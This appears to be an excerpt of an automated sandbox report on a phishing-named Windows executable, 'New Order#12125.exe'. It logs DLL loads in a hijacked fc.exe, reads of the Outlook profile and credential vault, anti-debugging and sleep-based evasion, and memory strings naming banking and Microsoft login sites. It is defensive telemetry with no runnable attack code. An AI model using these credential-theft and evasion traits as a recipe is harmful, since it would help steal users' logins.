              Source: C:\Windows\SysWOW64\fc.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: ieframe.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: netapi32.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: version.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: wkscli.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: netutils.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: secur32.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: mlang.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: propsys.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: winsqlite3.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: vaultcli.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: cryptbase.dll
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe Section loaded: wininet.dll
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe Section loaded: mswsock.dll
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe Section loaded: dnsapi.dll
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe Section loaded: iphlpapi.dll
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe Section loaded: fwpuclnt.dll
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe Section loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\fc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
              Source: C:\Windows\SysWOW64\fc.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
              Source: New Order#12125.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: fc.pdb source: New Order#12125.exe, 00000000.00000003.1801698818.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp, XcmmvCqVSCAb.exe, 00000003.00000002.3857137483.00000000013D8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: fc.pdbGCTL source: New Order#12125.exe, 00000000.00000003.1801698818.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp, XcmmvCqVSCAb.exe, 00000003.00000002.3857137483.00000000013D8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XcmmvCqVSCAb.exe, 00000003.00000000.1721505934.000000000001E000.00000002.00000001.01000000.00000005.sdmp, XcmmvCqVSCAb.exe, 00000007.00000002.3849029999.000000000001E000.00000002.00000001.01000000.00000005.sdmp
              Source: Binary string: wntdll.pdbUGP source: New Order#12125.exe, 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, New Order#12125.exe, 00000000.00000002.1802265375.000000000166E000.00000040.00001000.00020000.00000000.sdmp, New Order#12125.exe, 00000000.00000003.1705156829.0000000001321000.00000004.00000020.00020000.00000000.sdmp, New Order#12125.exe, 00000000.00000003.1702526408.000000000117C000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000004.00000002.3862729479.000000000384E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000004.00000003.1801920951.0000000003347000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000004.00000003.1803992712.00000000034FD000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000004.00000002.3862729479.00000000036B0000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: New Order#12125.exe, New Order#12125.exe, 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, New Order#12125.exe, 00000000.00000002.1802265375.000000000166E000.00000040.00001000.00020000.00000000.sdmp, New Order#12125.exe, 00000000.00000003.1705156829.0000000001321000.00000004.00000020.00020000.00000000.sdmp, New Order#12125.exe, 00000000.00000003.1702526408.000000000117C000.00000004.00000020.00020000.00000000.sdmp, fc.exe, fc.exe, 00000004.00000002.3862729479.000000000384E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000004.00000003.1801920951.0000000003347000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000004.00000003.1803992712.00000000034FD000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000004.00000002.3862729479.00000000036B0000.00000040.00001000.00020000.00000000.sdmp
              Source: New Order#12125.exe Static PE information: section name: .text entropy: 7.995289145928988
              Source: C:\Windows\SysWOW64\fc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\New Order#12125.exe Code function: 0_2_0154096E rdtsc 0_2_0154096E
              Source: C:\Windows\SysWOW64\fc.exe Window / User API: threadDelayed 9828
              Source: C:\Users\user\Desktop\New Order#12125.exe API coverage: 0.7 %
              Source: C:\Windows\SysWOW64\fc.exe API coverage: 2.6 %
              Source: C:\Windows\SysWOW64\fc.exe TID: 7848 Thread sleep count: 145 > 30
              Source: C:\Windows\SysWOW64\fc.exe TID: 7848 Thread sleep time: -290000s >= -30000s
              Source: C:\Windows\SysWOW64\fc.exe TID: 7848 Thread sleep count: 9828 > 30
              Source: C:\Windows\SysWOW64\fc.exe TID: 7848 Thread sleep time: -19656000s >= -30000s
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe TID: 7948 Thread sleep time: -75000s >= -30000s
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe TID: 7948 Thread sleep count: 34 > 30
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe TID: 7948 Thread sleep time: -51000s >= -30000s
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe TID: 7948 Thread sleep count: 38 > 30
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe TID: 7948 Thread sleep time: -38000s >= -30000s
              Source: C:\Windows\SysWOW64\fc.exe Last function: Thread delayed
              Source: C:\Windows\SysWOW64\fc.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_02E6C870 FindFirstFileW,FindNextFileW,FindClose,4_2_02E6C870
              Source: 17O3k-2I.4.dr Binary or memory string: ms.portal.azure.comVMware20,11696494690
              Source: 17O3k-2I.4.dr Binary or memory string: discord.comVMware20,11696494690f
              Source: 17O3k-2I.4.dr Binary or memory string: AMC password management pageVMware20,11696494690
              Source: 17O3k-2I.4.dr Binary or memory string: outlook.office.comVMware20,11696494690s
              Source: 17O3k-2I.4.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
              Source: 17O3k-2I.4.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
              Source: 17O3k-2I.4.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
              Source: 17O3k-2I.4.dr Binary or memory string: interactivebrokers.comVMware20,11696494690
              Source: 17O3k-2I.4.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
              Source: 17O3k-2I.4.dr Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
              Source: 17O3k-2I.4.dr Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
              Source: 17O3k-2I.4.dr Binary or memory string: outlook.office365.comVMware20,11696494690t
              Source: 17O3k-2I.4.dr Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
              Source: firefox.exe, 00000009.00000002.2102683008.0000023F861AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll)
              Source: 17O3k-2I.4.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
              Source: 17O3k-2I.4.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
              Source: 17O3k-2I.4.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
              Source: fc.exe, 00000004.00000002.3852014344.0000000003020000.00000004.00000020.00020000.00000000.sdmp, XcmmvCqVSCAb.exe, 00000007.00000002.3857135034.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: 17O3k-2I.4.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
              Source: 17O3k-2I.4.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
              Source: 17O3k-2I.4.dr Binary or memory string: tasks.office.comVMware20,11696494690o
              Source: 17O3k-2I.4.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
              Source: 17O3k-2I.4.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
              Source: 17O3k-2I.4.dr Binary or memory string: dev.azure.comVMware20,11696494690j
              Source: 17O3k-2I.4.dr Binary or memory string: global block list test formVMware20,11696494690
              Source: 17O3k-2I.4.dr Binary or memory string: turbotax.intuit.comVMware20,11696494690t
              Source: 17O3k-2I.4.dr Binary or memory string: bankofamerica.comVMware20,11696494690x
              Source: 17O3k-2I.4.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
              Source: 17O3k-2I.4.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
              Source: 17O3k-2I.4.dr Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
              Source: 17O3k-2I.4.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
              Source: 17O3k-2I.4.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
              Source: 17O3k-2I.4.dr Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
              Source: C:\Users\user\Desktop\New Order#12125.exe Process information queried: ProcessInformation
              Source: C:\Users\user\Desktop\New Order#12125.exe Process queried: DebugPort
              Source: C:\Windows\SysWOW64\fc.exe Process queried: DebugPort
              Source: C:\Users\user\Desktop\New Order#12125.exe Code function: 0_2_0154096E rdtsc 0_2_0154096E
              Source: C:\Users\user\Desktop\New Order#12125.exe Code function: 0_2_002A7CA3 LdrLoadDll, 0_2_002A7CA3
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152E53E mov eax, dword ptr fs:[00000030h]0_2_0152E53E
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152E53E mov eax, dword ptr fs:[00000030h]0_2_0152E53E
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152E53E mov eax, dword ptr fs:[00000030h]0_2_0152E53E
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152E53E mov eax, dword ptr fs:[00000030h]0_2_0152E53E
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152E53E mov eax, dword ptr fs:[00000030h]0_2_0152E53E
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015065D0 mov eax, dword ptr fs:[00000030h]0_2_015065D0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153A5D0 mov eax, dword ptr fs:[00000030h]0_2_0153A5D0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153A5D0 mov eax, dword ptr fs:[00000030h]0_2_0153A5D0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153E5CF mov eax, dword ptr fs:[00000030h]0_2_0153E5CF
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153E5CF mov eax, dword ptr fs:[00000030h]0_2_0153E5CF
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015025E0 mov eax, dword ptr fs:[00000030h]0_2_015025E0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152E5E7 mov eax, dword ptr fs:[00000030h]0_2_0152E5E7
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152E5E7 mov eax, dword ptr fs:[00000030h]0_2_0152E5E7
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152E5E7 mov eax, dword ptr fs:[00000030h]0_2_0152E5E7
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152E5E7 mov eax, dword ptr fs:[00000030h]0_2_0152E5E7
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152E5E7 mov eax, dword ptr fs:[00000030h]0_2_0152E5E7
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152E5E7 mov eax, dword ptr fs:[00000030h]0_2_0152E5E7
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152E5E7 mov eax, dword ptr fs:[00000030h]0_2_0152E5E7
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152E5E7 mov eax, dword ptr fs:[00000030h]0_2_0152E5E7
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153C5ED mov eax, dword ptr fs:[00000030h]0_2_0153C5ED
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153C5ED mov eax, dword ptr fs:[00000030h]0_2_0153C5ED
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153E59C mov eax, dword ptr fs:[00000030h]0_2_0153E59C
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01502582 mov eax, dword ptr fs:[00000030h]0_2_01502582
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01502582 mov ecx, dword ptr fs:[00000030h]0_2_01502582
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01534588 mov eax, dword ptr fs:[00000030h]0_2_01534588
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015245B1 mov eax, dword ptr fs:[00000030h]0_2_015245B1
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015245B1 mov eax, dword ptr fs:[00000030h]0_2_015245B1
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015805A7 mov eax, dword ptr fs:[00000030h]0_2_015805A7
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015805A7 mov eax, dword ptr fs:[00000030h]0_2_015805A7
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015805A7 mov eax, dword ptr fs:[00000030h]0_2_015805A7
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152245A mov eax, dword ptr fs:[00000030h]0_2_0152245A
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015BA456 mov eax, dword ptr fs:[00000030h]0_2_015BA456
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153E443 mov eax, dword ptr fs:[00000030h]0_2_0153E443
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153E443 mov eax, dword ptr fs:[00000030h]0_2_0153E443
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153E443 mov eax, dword ptr fs:[00000030h]0_2_0153E443
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153E443 mov eax, dword ptr fs:[00000030h]0_2_0153E443
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153E443 mov eax, dword ptr fs:[00000030h]0_2_0153E443
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153E443 mov eax, dword ptr fs:[00000030h]0_2_0153E443
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153E443 mov eax, dword ptr fs:[00000030h]0_2_0153E443
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153E443 mov eax, dword ptr fs:[00000030h]0_2_0153E443
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_014F645D mov eax, dword ptr fs:[00000030h]0_2_014F645D
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152A470 mov eax, dword ptr fs:[00000030h]0_2_0152A470
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152A470 mov eax, dword ptr fs:[00000030h]0_2_0152A470
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152A470 mov eax, dword ptr fs:[00000030h]0_2_0152A470
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0158C460 mov ecx, dword ptr fs:[00000030h]0_2_0158C460
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01538402 mov eax, dword ptr fs:[00000030h]0_2_01538402
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01538402 mov eax, dword ptr fs:[00000030h]0_2_01538402
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01538402 mov eax, dword ptr fs:[00000030h]0_2_01538402
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153A430 mov eax, dword ptr fs:[00000030h]0_2_0153A430
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_014FC427 mov eax, dword ptr fs:[00000030h]0_2_014FC427
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_014FE420 mov eax, dword ptr fs:[00000030h]0_2_014FE420
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_014FE420 mov eax, dword ptr fs:[00000030h]0_2_014FE420
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_014FE420 mov eax, dword ptr fs:[00000030h]0_2_014FE420
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01586420 mov eax, dword ptr fs:[00000030h]0_2_01586420
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01586420 mov eax, dword ptr fs:[00000030h]0_2_01586420
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01586420 mov eax, dword ptr fs:[00000030h]0_2_01586420
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01586420 mov eax, dword ptr fs:[00000030h]0_2_01586420
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01586420 mov eax, dword ptr fs:[00000030h]0_2_01586420
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01586420 mov eax, dword ptr fs:[00000030h]0_2_01586420
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01586420 mov eax, dword ptr fs:[00000030h]0_2_01586420
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015004E5 mov ecx, dword ptr fs:[00000030h]0_2_015004E5
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015BA49A mov eax, dword ptr fs:[00000030h]0_2_015BA49A
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015344B0 mov ecx, dword ptr fs:[00000030h]0_2_015344B0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0158A4B0 mov eax, dword ptr fs:[00000030h]0_2_0158A4B0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015064AB mov eax, dword ptr fs:[00000030h]0_2_015064AB
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01500750 mov eax, dword ptr fs:[00000030h]0_2_01500750
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542750 mov eax, dword ptr fs:[00000030h]0_2_01542750
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542750 mov eax, dword ptr fs:[00000030h]0_2_01542750
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0158E75D mov eax, dword ptr fs:[00000030h]0_2_0158E75D
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01584755 mov eax, dword ptr fs:[00000030h]0_2_01584755
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153674D mov esi, dword ptr fs:[00000030h]0_2_0153674D
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153674D mov eax, dword ptr fs:[00000030h]0_2_0153674D
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153674D mov eax, dword ptr fs:[00000030h]0_2_0153674D
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01508770 mov eax, dword ptr fs:[00000030h]0_2_01508770
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01510770 mov eax, dword ptr fs:[00000030h]0_2_01510770
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01510770 mov eax, dword ptr fs:[00000030h]0_2_01510770
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01510770 mov eax, dword ptr fs:[00000030h]0_2_01510770
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01510770 mov eax, dword ptr fs:[00000030h]0_2_01510770
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01510770 mov eax, dword ptr fs:[00000030h]0_2_01510770
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01510770 mov eax, dword ptr fs:[00000030h]0_2_01510770
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01510770 mov eax, dword ptr fs:[00000030h]0_2_01510770
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01510770 mov eax, dword ptr fs:[00000030h]0_2_01510770
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01510770 mov eax, dword ptr fs:[00000030h]0_2_01510770
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01510770 mov eax, dword ptr fs:[00000030h]0_2_01510770
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01510770 mov eax, dword ptr fs:[00000030h]0_2_01510770
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01510770 mov eax, dword ptr fs:[00000030h]0_2_01510770
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01500710 mov eax, dword ptr fs:[00000030h]0_2_01500710
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01530710 mov eax, dword ptr fs:[00000030h]0_2_01530710
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153C700 mov eax, dword ptr fs:[00000030h]0_2_0153C700
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0157C730 mov eax, dword ptr fs:[00000030h]0_2_0157C730
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153273C mov eax, dword ptr fs:[00000030h]0_2_0153273C
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153273C mov ecx, dword ptr fs:[00000030h]0_2_0153273C
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153273C mov eax, dword ptr fs:[00000030h]0_2_0153273C
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153C720 mov eax, dword ptr fs:[00000030h]0_2_0153C720
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153C720 mov eax, dword ptr fs:[00000030h]0_2_0153C720
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0150C7C0 mov eax, dword ptr fs:[00000030h]0_2_0150C7C0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015807C3 mov eax, dword ptr fs:[00000030h]0_2_015807C3
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015047FB mov eax, dword ptr fs:[00000030h]0_2_015047FB
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015047FB mov eax, dword ptr fs:[00000030h]0_2_015047FB
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0158E7E1 mov eax, dword ptr fs:[00000030h]0_2_0158E7E1
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015227ED mov eax, dword ptr fs:[00000030h]0_2_015227ED
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015227ED mov eax, dword ptr fs:[00000030h]0_2_015227ED
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015227ED mov eax, dword ptr fs:[00000030h]0_2_015227ED
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015A678E mov eax, dword ptr fs:[00000030h]0_2_015A678E
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015B47A0 mov eax, dword ptr fs:[00000030h]0_2_015B47A0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015007AF mov eax, dword ptr fs:[00000030h]0_2_015007AF
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0151C640 mov eax, dword ptr fs:[00000030h]0_2_0151C640
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01532674 mov eax, dword ptr fs:[00000030h]0_2_01532674
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015C866E mov eax, dword ptr fs:[00000030h]0_2_015C866E
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015C866E mov eax, dword ptr fs:[00000030h]0_2_015C866E
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153A660 mov eax, dword ptr fs:[00000030h]0_2_0153A660
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153A660 mov eax, dword ptr fs:[00000030h]0_2_0153A660
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542619 mov eax, dword ptr fs:[00000030h]0_2_01542619
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0151260B mov eax, dword ptr fs:[00000030h]0_2_0151260B
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0151260B mov eax, dword ptr fs:[00000030h]0_2_0151260B
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0151260B mov eax, dword ptr fs:[00000030h]0_2_0151260B
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0151260B mov eax, dword ptr fs:[00000030h]0_2_0151260B
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0151260B mov eax, dword ptr fs:[00000030h]0_2_0151260B
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0151260B mov eax, dword ptr fs:[00000030h]0_2_0151260B
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0151260B mov eax, dword ptr fs:[00000030h]0_2_0151260B
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0157E609 mov eax, dword ptr fs:[00000030h]0_2_0157E609
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01536620 mov eax, dword ptr fs:[00000030h]0_2_01536620
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01538620 mov eax, dword ptr fs:[00000030h]0_2_01538620
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0151E627 mov eax, dword ptr fs:[00000030h]0_2_0151E627
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0150262C mov eax, dword ptr fs:[00000030h]0_2_0150262C
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153A6C7 mov ebx, dword ptr fs:[00000030h]0_2_0153A6C7
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153A6C7 mov eax, dword ptr fs:[00000030h]0_2_0153A6C7
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0157E6F2 mov eax, dword ptr fs:[00000030h]0_2_0157E6F2
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0157E6F2 mov eax, dword ptr fs:[00000030h]0_2_0157E6F2
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0157E6F2 mov eax, dword ptr fs:[00000030h]0_2_0157E6F2
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0157E6F2 mov eax, dword ptr fs:[00000030h]0_2_0157E6F2
